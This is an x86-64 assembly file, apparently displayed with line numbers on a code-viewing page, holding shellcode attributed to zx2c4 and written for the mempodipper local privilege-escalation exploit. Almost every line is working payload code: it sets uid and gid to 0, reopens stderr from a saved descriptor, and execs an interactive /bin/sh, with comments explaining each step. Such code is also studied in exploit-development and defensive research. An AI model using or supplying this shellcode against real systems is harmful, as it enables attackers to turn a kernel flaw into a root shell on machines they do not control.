1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
BITS 64
; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
;
; by zx2c4
;setuid(0)
xor rdi,rdi
mov al,0x69
syscall
;setgid(0)
xor rdi,rdi
mov al,0x6a
syscall
;dup2(6, 2)
xor rsi,rsi
mov dil,0x6
mov sil,0x2
mov al,0x21
syscall
; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)
mov qword rbx,'//bin/sh' ; rbx = //bin/sh
shr rbx,0x8 ; remove leading / from rbx
push rbx ; push rbx to stack
mov rdi,rsp ; set rdi (arg 1) to top of stack
xor rbx,rbx ; rbx = 0
mov bx,'-i' ; rbx = '-i'
push rbx ; push rbx to stack
mov rcx,rsp ; set rcx to top of stack
xor rax,rax ; rax = 0
; so at this point:
; rdi is a pointer to '/bin/sh'
; rcx is a pointer to '-i'
; rax is null
; since they are all the same size, we'll push them on the stack
; and then it will be an array:
push rax ; push rax to stack
push rcx ; push rcx to stack
push rdi ; push rdi to stack
mov rsi,rsp ; set rsi (arg 2) to top of stack
xor rdx,rdx ; rdx (arg 3) = 0
mov al,0x3b ; al = 0x3b, which is the exec call
syscall
|